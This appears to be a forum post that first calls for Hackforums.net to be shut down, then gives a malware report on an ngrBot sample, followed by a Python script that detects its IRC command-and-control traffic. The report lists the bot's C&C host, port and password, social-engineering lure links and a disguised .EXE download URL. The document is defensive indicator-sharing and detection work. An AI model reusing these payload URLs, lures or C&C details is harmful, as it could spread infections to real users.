Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it is a website which has an undue influence on young people, as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services, etc.

I'm not certain what your criteria are for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand, and I don't blame this site for exercising caution and withdrawing the 'positive for malware' decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activities and it should be closed as soon as possible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

jskd6c.jumpingcrab.com (ngrBot hosted in Panama, Eric Szopa)

Looks like ngrBot, the reptile mod made by fubar and jam3s, is spreading a lot.

Resolved: [jskd6c.jumpingcrab.com] to [184.107.143.126]

Remote Host       Port Number     Notes
184.107.143.126   2009 and 6667   PASS ngrBot (IRC server password sent by the bot)
213.251.170.52    80
70.85.227.66      80

PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" s="143360 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PONG :irc.sudominio.org
NICK n{US|XPa}rzvzsak
USER rzvzsak 0 0 :rzvzsak
JOIN #root 301189
PRIVMSG #root :[MSN]: Updated MSN spread interval to "1"
PRIVMSG #root :[MSN]: Updated MSN spread message to "jijiji mira :D bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[HTTP]: Updated HTTP spread interval to "1"


* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE
o http://www.befordsouthpointford.com/bfam/llllllllll.EXE

Crypter used to protect the bot (debug symbol path left in the loader stub):
C:\Users\M4x\Documents\Programmieren\PECRYPT\Client\EXECUTABLE\Loader_Stub\Release\Loader_Stub.pdb

Detection:
2/41 on VirusTotal


Hosting info:
http://whois.domaintools.com/184.107.143.126
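The IRC capture above is a good teaching sample for a C&C detector: the bot authenticates with a fixed server password, uses a nick in the n{COUNTRY|tag}random format, joins a keyed channel, and reports spread-message updates and download-and-execute results as PRIVMSG lines. The Python below is an added example (not code from the original post or from the ngrBot authors) that pulls those indicators out of client-side IRC lines and decides whether the session looks like ngrBot. The sample input is the capture shown above plus two constructed benign IRC lines; the regular expressions and the "two or more reasons" threshold are assumptions derived only from this one capture and would need widening for other builds.

```python
"""Extract ngrBot C&C indicators from captured IRC client traffic (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Patterns derived from the capture on this page (assumption: other builds may differ).
NICK_RE = re.compile(r"^NICK n\{([A-Z]{2})\|([^}]+)\}(\S+)$")     # n{CC|tag}random
PASS_RE = re.compile(r"^PASS (\S+)$")                              # server password
JOIN_RE = re.compile(r"^JOIN (#\S+)(?: (\S+))?$")                  # channel [key]
SPREAD_RE = re.compile(
    r'^PRIVMSG (#\S+) :\[(\w+)\]: Updated \w+ spread (message|interval) to "(.*)"$')
DOWNLOAD_RE = re.compile(
    r'^PRIVMSG (#\S+) :\[d="([^"]+)" s="([^"]+)"\] Executed file "([^"]+)"')
URL_RE = re.compile(r"https?://\S+")

# Sample traffic: the lines from the capture above (the PASS line is the one
# recorded in the host table), plus two constructed benign lines to ignore.
SAMPLE_LINES = [
    "PASS ngrBot",
    "NICK n{US|XPa}rzvzsak",
    "USER rzvzsak 0 0 :rzvzsak",
    "JOIN #root 301189",
    "PONG :irc.sudominio.org",
    'PRIVMSG #root :[MSN]: Updated MSN spread interval to "1"',
    'PRIVMSG #root :[MSN]: Updated MSN spread message to "jijiji mira :D bajalo :D http://bit.ly/kgPE5S"',
    'PRIVMSG #root :[HTTP]: Updated HTTP spread interval to "1"',
    'PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo :D http://bit.ly/kgPE5S"',
    'PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" '
    's="143360 bytes"] Executed file "C:\\Documents and Settings\\UserName\\Application Data\\1.tmp" '
    "- Download retries: 0",
    "NICK alice",                                   # constructed benign line
    "PRIVMSG #linux :anyone tried the new kernel?", # constructed benign line
]


@dataclass
class Indicators:
    irc_password: Optional[str] = None
    nick: Optional[str] = None
    country: Optional[str] = None
    os_tag: Optional[str] = None              # "XPa" here; meaning of the trailing "a" not stated on the page
    channels: Dict[str, Optional[str]] = field(default_factory=dict)   # channel -> key
    spread_urls: Set[str] = field(default_factory=set)                 # lures pushed over MSN/HTTP
    payload_urls: Set[str] = field(default_factory=set)                # binaries fetched and run
    dropped_files: Set[str] = field(default_factory=set)
    reasons: List[str] = field(default_factory=list)

    def note(self, reason: str) -> None:
        if reason not in self.reasons:
            self.reasons.append(reason)

    def is_ngrbot(self) -> bool:
        # Assumed threshold: any two independent ngrBot traits in one session.
        return len(self.reasons) >= 2


def extract(lines) -> Indicators:
    """Walk client->server IRC lines and collect indicators; unknown lines are ignored."""
    ind = Indicators()
    for raw in lines:
        line = raw.rstrip("\r\n")
        m = PASS_RE.match(line)
        if m:
            ind.irc_password = m.group(1)
            if m.group(1).lower() == "ngrbot":
                ind.note("server password 'ngrBot'")
            continue
        m = NICK_RE.match(line)
        if m:
            ind.nick = line.split(" ", 1)[1]
            ind.country, ind.os_tag = m.group(1), m.group(2)
            ind.note("nick in n{CC|tag}random format")
            continue
        m = JOIN_RE.match(line)
        if m:
            ind.channels[m.group(1)] = m.group(2)
            continue
        m = SPREAD_RE.match(line)
        if m:
            if m.group(3) == "message":
                ind.spread_urls.update(URL_RE.findall(m.group(4)))
            ind.note("spread module status report (%s)" % m.group(2))
            continue
        m = DOWNLOAD_RE.match(line)
        if m:
            ind.payload_urls.add(m.group(2))
            ind.dropped_files.add(m.group(4))
            ind.note("download-and-execute report")
    return ind


if __name__ == "__main__":
    result = extract(SAMPLE_LINES)
    print("ngrBot session:", result.is_ngrbot())
    for reason in result.reasons:
        print(" -", reason)
    print("spread lures:", sorted(result.spread_urls))
    print("payloads:", sorted(result.payload_urls))
```

The point of keeping the PASS, NICK and JOIN matches separate from the PRIVMSG matches is that the status reports only appear once the bot has been tasked; on a fresh infection you may see nothing but the password and the tagged nick, which is why two traits are enough to flag a session rather than waiting for a download report.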